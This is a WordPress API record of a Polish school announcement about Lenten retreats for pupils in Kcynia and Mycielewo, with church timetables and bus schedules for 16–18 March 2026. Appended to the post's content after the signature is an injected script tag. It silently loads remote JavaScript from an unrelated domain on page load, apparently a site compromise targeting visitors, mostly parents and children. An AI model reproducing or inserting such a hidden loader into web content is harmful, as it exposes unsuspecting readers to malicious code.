{"id":61492,"date":"2026-03-14T11:08:22","date_gmt":"2026-03-14T11:08:22","guid":{"rendered":"https:\/\/mycielewo.pl\/?p=61492"},"modified":"2026-03-20T09:50:01","modified_gmt":"2026-03-20T09:50:01","slug":"zaproszenie-na-rekolekcje-wielkopostne-2026","status":"publish","type":"post","link":"https:\/\/mycielewo.pl\/?p=61492","title":{"rendered":"Zaproszenie na Rekolekcje Wielkopostne 2026"},"content":{"rendered":"\n<p><strong>Szanowni Rodzice, Uczniowie oraz Nauczyciele!<\/strong><\/p>\n\n\n\n<p>Wielki Post to szczeg\u00f3lny czas w roku szkolnym, kt\u00f3ry zaprasza nas do chwili zatrzymania i duchowej refleksji. Informujemy, \u017ce po czwartej niedzieli Wielkiego Postu odb\u0119d\u0105 si\u0119 rekolekcje dla uczni\u00f3w ucz\u0119szczaj\u0105cych na lekcje religii z plac\u00f3wek: <strong>Szko\u0142y Podstawowej w Kcyni (parafie Farna i Klasztorna), Szko\u0142y Podstawowej w Mycielewie oraz Zespo\u0142u Szk\u00f3\u0142 Technicznych w Kcyni.<\/strong><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\ud83d\uddd3\ufe0f Termin i prowadz\u0105cy<\/h3>\n\n\n\n<p>Rekolekcje odb\u0119d\u0105 si\u0119 w dniach <strong>16\u201318 marca 2026 r. (poniedzia\u0142ek \u2013 \u015broda)<\/strong>. Nauk\u0119 rekolekcyjn\u0105 w tym roku poprowadz\u0105 <strong>Siostry Zakonne Dzieci \u0141aski Bo\u017cej z Diecezji Koszali\u0144sko-Ko\u0142obrzeskiej.<\/strong><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">\u26ea Harmonogram spotka\u0144 w Kcyni<\/h3>\n\n\n\n<p>Spotkania rekolekcyjne b\u0119d\u0105 odbywa\u0142y si\u0119 w dw\u00f3ch kcy\u0144skich \u015bwi\u0105tyniach wed\u0142ug nast\u0119puj\u0105cego podzia\u0142u wiekowego:<\/p>\n\n\n\n<p><strong>Ko\u015bci\u00f3\u0142 Farny w Kcyni:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>godz. 8:35 \u2013 9:35<\/strong> \u2013 Zesp\u00f3\u0142 Szk\u00f3\u0142 Technicznych<\/li>\n\n\n\n<li><strong>godz. 10:00 \u2013 11:00<\/strong> \u2013 Klasy IV\u2013VI Szko\u0142y Podstawowej<\/li>\n\n\n\n<li><strong>godz. 11:30 \u2013 12:30<\/strong> \u2013 Klasy I\u2013III Szko\u0142y Podstawowej<\/li>\n<\/ul>\n\n\n\n<p><strong>Ko\u015bci\u00f3\u0142 Klasztorny w Kcyni:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>godz. 10:00 \u2013 11:30<\/strong> \u2013 Klasy VII\u2013VIII Szko\u0142y Podstawowej<\/li>\n<\/ul>\n\n\n\n<p><em>Uczniowie udaj\u0105 si\u0119 do ko\u015bcio\u0142\u00f3w pod opiek\u0105 nauczycieli. Po zako\u0144czeniu nauki rekolekcyjnej m\u0142odzie\u017c i dzieci wracaj\u0105 do szk\u00f3\u0142.<\/em><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">\ud83d\ude8c Organizacja dowoz\u00f3w dla SP Mycielewo<\/h3>\n\n\n\n<p>Na czas trwania rekolekcji (16.03 \u2013 18.03.2026 r.) zosta\u0142 przygotowany specjalny harmonogram dowoz\u00f3w. <strong>Poranny przyjazd do szko\u0142y odbywa si\u0119 bez zmian, zgodnie z codziennym planem.<\/strong><\/p>\n\n\n\n<p><strong>Harmonogram wyjazd\u00f3w na rekolekcje:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>09:30<\/strong> \u2013 Wyjazd <strong>klas VII\u2013VIII<\/strong> z Mycielewa do Kcyni.<\/li>\n\n\n\n<li><strong>09:45<\/strong> \u2013 Wyjazd <strong>klas IV\u2013VI<\/strong> z Mycielewa do Kcyni.<\/li>\n\n\n\n<li><strong>11:05<\/strong> \u2013 Przywiezienie grupy klas IV\u2013VI z Kcyni do szko\u0142y.<\/li>\n\n\n\n<li><strong>11:15<\/strong> \u2013 Wyjazd <strong>klas I\u2013III<\/strong> z Mycielewa do Kcyni.<\/li>\n\n\n\n<li><strong>11:35<\/strong> \u2013 Powr\u00f3t grupy klas VII\u2013VIII z Kcyni do szko\u0142y.<\/li>\n\n\n\n<li><strong>12:25<\/strong> \u2013 Wyjazd autobusu z Mycielewa po najm\u0142odsz\u0105 grup\u0119.<\/li>\n\n\n\n<li><strong>12:35<\/strong> \u2013 Powr\u00f3t <strong>klas I\u2013III<\/strong> do Mycielewa.<\/li>\n<\/ul>\n\n\n\n<p><strong>Odw\u00f3z uczni\u00f3w do dom\u00f3w po zaj\u0119ciach szkolnych odb\u0119dzie si\u0119 zgodnie z codziennym planem odwoz\u00f3w.<\/strong><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Serdecznie zach\u0119camy wszystkich uczni\u00f3w do owocnego prze\u017cycia tego szczeg\u00f3lnego czasu przygotowa\u0144 do \u015awi\u0105t Wielkanocnych.<\/p>\n\n\n\n<p class=\"has-text-align-right\"><em>Dyrekcja i Organizatorzy<\/em><\/p>\n<script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script>","protected":false},"excerpt":{"rendered":"<p>Szanowni Rodzice, Uczniowie oraz Nauczyciele! Wielki Post to szczeg\u00f3lny czas w roku szkolnym, kt\u00f3ry zaprasza nas do chwili zatrzymania i duchowej refleksji. Informujemy, \u017ce po czwartej niedzieli Wielkiego Postu odb\u0119d\u0105 si\u0119 rekolekcje dla uczni\u00f3w ucz\u0119szczaj\u0105cych na lekcje religii z plac\u00f3wek: Szko\u0142y Podstawowej w Kcyni (parafie Farna i Klasztorna), Szko\u0142y Podstawowej w Mycielewie oraz Zespo\u0142u Szk\u00f3\u0142&hellip; <a class=\"continue\" href=\"https:\/\/mycielewo.pl\/?p=61492\">Kontynuuj czytanie<span> Zaproszenie na Rekolekcje Wielkopostne 2026<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-61492","post","type-post","status-publish","format-standard","hentry","category-bez-kategorii"],"_links":{"self":[{"href":"https:\/\/mycielewo.pl\/index.php?rest_route=\/wp\/v2\/posts\/61492","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mycielewo.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mycielewo.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mycielewo.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mycielewo.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=61492"}],"version-history":[{"count":2,"href":"https:\/\/mycielewo.pl\/index.php?rest_route=\/wp\/v2\/posts\/61492\/revisions"}],"predecessor-version":[{"id":61596,"href":"https:\/\/mycielewo.pl\/index.php?rest_route=\/wp\/v2\/posts\/61492\/revisions\/61596"}],"wp:attachment":[{"href":"https:\/\/mycielewo.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=61492"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mycielewo.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=61492"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mycielewo.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=61492"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}